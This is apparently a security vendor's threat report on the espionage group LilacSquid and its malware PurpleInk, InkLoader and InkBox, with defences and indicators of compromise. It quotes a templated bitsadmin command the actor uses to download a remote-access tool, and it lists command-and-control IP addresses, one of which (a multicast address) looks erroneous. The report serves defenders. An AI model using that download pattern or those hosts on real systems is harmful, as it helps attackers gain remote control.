Threat Reports

Everything You Need to Know About LilacSquid

Written by Marketing | Jun 13, 2024 2:38:03 PM

executive summary

Last month, Avertium’s Cyber Threat Intelligence team reported on an advanced persistent threat actor (APT) known as LilacSquid. This month, we are digging further to uncover the threat actor's tactics and techniques.

Active since at least 2021, LilacSquid (also known as UAT-4820) focuses on cyber espionage. This threat actor has targeted IT companies developing software for research and industrial sectors in the U.S., energy sector organizations in Europe, and pharmaceutical companies in Asia.

The threat actor uses various tactics, techniques, and procedures that resemble those used by North Korean APT groups, specifically Andariel and its overarching structure, Lazarus. Their campaign utilizes MeshAgent, an open-source remote management tool, along with a customized version of QuasarRAT, referred to as "PurpleInk," as primary implants following the compromise of vulnerable application servers exposed to the internet. Let’s look at LilacSquid, as well as recommendations on how organizations can protect themselves from this kind of threat actor.

 

 

 

lilacsquid - uat - 4820

As previously stated, LilacSquid has been active since at least 2021. The threat actor targets IT enterprises in the U.S., energy industries across Europe, and pharmaceutical firms throughout Asia. Their primary goals are information theft and espionage.

LilacSquid aims to maintain extended access to compromised entities to exfiltrate valuable data to their own servers. To achieve initial access, LilacSquid uses a variety of techniques, such as exploiting vulnerabilities in publicly accessible application servers and utilizing compromised RDP credentials.

 

 

tactics + techniques

The tactics, techniques, and procedures (TTPs) used by the LilacSquid closely resemble those of North Korean advanced persistent threat groups, such as Andariel and its parent organization, Lazarus. Notably, the use of MeshAgent software to maintain access post-compromise and the extensive use of proxy and tunneling tools suggest a possible connection between LilacSquid and Lazarus, indicating they might share tools, infrastructure, or other resources.

LilacSquid begins its attack by exploiting vulnerabilities in web applications. After gaining access, the threat actor deploys scripts to create folders for malware, then downloads and executes MeshAgent, an open-source remote management tool. This download typically uses the legitimate Windows tool bitsadmin with the following command:

 

bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-

 

MeshAgent uses a text configuration file called an MSH file, which includes a victim identifier and the Command & Control address. This tool allows the operator to list all target devices, view and control desktops, manage files, and collect system information. Once MeshAgent is running, it activates other tools like Secure Socket Funneling for proxying and tunneling communications, and the InkLoader/PurpleInk malware implants.

 

INKLOADER

According to an analysis by Cisco Talos, when LilacSquid used compromised RDP credentials for access, the infection chain changed slightly. They either deployed MeshAgent and subsequent implants or introduced another component before PurpleInk.

InkLoader is a straightforward yet effective .NET-based malware loader, designed to execute a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host, rather than the actual malware it runs. So far, we have only observed PurpleInk being executed via InkLoader, but LilacSquid might use InkLoader to deploy additional malware implants.

Talos observed that LilacSquid deployed InkLoader along with PurpleInk only when they successfully created and maintained remote sessions via RDP using stolen credentials. A successful RDP login led to the download of InkLoader and PurpleInk, copying these artifacts into the desired directories on disk, and registering InkLoader as a service. This service then started InkLoader, which in turn deployed PurpleInk.

 

Image 1: LilacSquid's Initial Access

Source: Cisco Talos

 

 

PURPLEINK MALWARE

The primary implant used by the LilacSquid threat actor, PurpleInk, is derived from QuasarRAT, a remote access tool available online since at least 2014. Development on PurpleInk began in 2021, starting from the QuasarRAT base, and it continues to receive updates. The malware is heavily obfuscated to make detection more difficult.

PurpleInk uses a base64-encoded configuration file containing the IP address and port number for the C2 server. It can gather basic information such as drive details (volume labels, root directory names, drive type, and format), running process information, and system information (memory size, username, computer name, IP addresses, computer uptime).

Additionally, PurpleInk can enumerate folders, file names, and sizes, and modify file contents. It can also start a remote shell and send or receive data from a specified remote address, usually a proxy server. Below are the capabilities PurpleInk has for communicating with its proxy servers:

  • Connect to a new proxy server as specified by the C2.
  • Send data to a new or existing proxy server.
  • Disconnect from a specified proxy server.
  • Receive and process data from another connected proxy server.

 

INKBOX - CUSTOM LOADER

InkBox is a malware loader designed to read from a predefined file path on disk and decrypt its contents. The decrypted content consists of another executable assembly, which is then executed by invoking its Entry Point within the InkBox process. This second assembly serves as the backdoor known as PurpleInk.

Since 2021, LilacSquid has been using InkBox to deploy PurpleInk. From 2023 onward, they modified their approach, allowing PurpleInk to run independently as a separate process. However, even in this updated method, PurpleInk is still initiated through another component called "InkLoader."

 

 

ANDARIEL

As previously mentioned, LilacSquid’s TTPs closely resembles Andariel’s which is a threat actor under Lazarus. Like LilacSquid, Andariel, also known as Nickel Hyatt, Onyx Sleet, and Silent Chollima, is an advanced persistent threat (APT) group affiliated with North Korea's strategic interests. The group has been active since 2008 and is known for utilizing tactics such as spear-phishing, watering hole attacks, and exploiting known security vulnerabilities in software to gain initial access and deploy malware within targeted networks.

Andariel initially focused on information theft and cyber espionage activities primarily within the defense sector. However, after 2016, it shifted its focus to include monetary gain objectives and became involved in ransomware attacks, targeting the banking and technology sectors.

Andariel actively exploited the Log4j vulnerability last year, and a new malware called EarlyRat was discovered on a system affected by the Log4j exploit. However, the initial attack vector for EarlyRat was found to be spear phishing.

EarlyRat is straightforward in design and can execute specified commands. It shares similarities with MagicRat. It was distributed via a spear phishing campaign originating from servers associated with the HolyGhost/Maui ransomware campaign, involving macro-enabled documents. Upon execution, it communicates system information to its command and control (C2) server.

As of June 2024, Andariel has been observed deploying a new Golang-based backdoor named Dora RAT in its operations targeting educational institutions, manufacturing companies, and construction firms in South Korea.

The threat actor likely utilizes malicious tools like Keylogger, Infostealer, and proxy tools to manage compromised systems and extract data. The attacks involve the exploitation of a vulnerable Apache Tomcat server for malware distribution. The specific server involved was running an outdated 2013 version of Apache Tomcat, exposing it to multiple vulnerabilities.

 

 

defense

To protect your organization from initial compromise tactics used by LilacSquid, it is essential to:

  • Ensure all internet-facing web applications are regularly updated and patched. Additionally, keep hardware, operating systems, and software up to date to mitigate common vulnerabilities.

  • Implement stringent policies for RDP connections from employees and deploy multifactor authentication whenever feasible to thwart unauthorized access to the corporate network via RDP.

  • Conduct proactive searches for MeshAgent configuration files on systems, especially if the tool is not part of internal operations.

  • Exercise caution and scrutinize any use of the bitsadmin tool for downloading or executing code.

  • Monitor network traffic for connections on unusual ports or direct communications with external IP addresses instead of domains.

  • Deploy endpoint detection and response (EDR) or extended detection and response (XDR) solutions on endpoints to identify and respond to suspicious activities effectively.

  • Educate employees on cybersecurity threats, with a focus on recognizing and reporting phishing attempts promptly.

 

 

how avertium is protecting our customers

It’s important to get ahead of the curve by being proactive with protecting your organization, instead of waiting to put out a massive fire. Avertium can provide the following services to help keep your organization safe from MITM attacks:

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills. See every threat in your attack surface, every device, every entry point, and every vulnerability. Our Attack Surface Management services include: 
    • Risk Assessments
    • Pen Testing and Social Engineering
    • Infrastructure Architecture and Integration
    • Zero Trust Network Architecture
    • Vulnerability Management
  • Fusion MXDR is the first MDR offering that fuses together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts.
  • Avertium uses KnowBe4 as a professional service for user awareness training. The service also includes Incident Response Table-Top exercises (IR TTX) and Core Security Document development, as well as a comprehensive new-school approach that integrates baseline testing using mock attacks.

 

MITRE MAP

 

LilacSquid

Andariel

 

INDICATORS OF COMPROMISE (IOCs)

LilacSquid

SHA-256

  • 2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8

IPv4

  • 67[.]213[.]221[.]6
  • 192[.]145[.]127[.]190
  • 45[.]9[.]251[.]14
  • 199[.]229[.]250[.]142

Andariel

IPv4

  • 226[.]132[.]219[.]125
  • 74[.]124[.]228[.]148

 

 

 

Supporting Documentation

Cisco Talos: LilacSquid Threat Actor Targets Multiple Sectors Worldwide With PurpleInk Malware (techrepublic.com)

LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader (talosintelligence.com)

Deciphering LilacSquid's Strategies for Long-Term Data Theft (hivepro.com)

Global cyberespionage campaign deployed by LilacSquid | SC Media (scmagazine.com)

Andariel Group unleashes New EarlyRAT malware - HiveForce Labs Threat Advisory (hivepro.com)

New "LilacSquid" Cyberespionage Group and Custom Malware Discovered | Cyber Insider

Unveiling the Depths of LilacSquid Attacks | by Scott Bolen | RONIN OWL CTI | Jun, 2024 | Medium

june-4-23-lilacsquid-the-stealthy-trilogy-of-purpleink-inkbox-and-inkloader.pdf (mphasis.com)

Andariel Hackers Target South Korean Institutes with New Dora RAT Malware (thehackernews.com)

Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors (thehackernews.com)

Analysis of APT Attack Cases Using Dora RAT Against Korean Companies (Andariel Group) - ASEC BLOG (ahnlab.com)

Ink Trails by LilacSquid: PurpleInk, InkBox, and InkLoader | Cyware Alerts - Hacker News

 

 

APPENDIX II: Disclaimer

This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.

Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.

 

Looking for your next read? 
Check out the blog, "The Move from Reactive GRC to Proactive GRCaaS"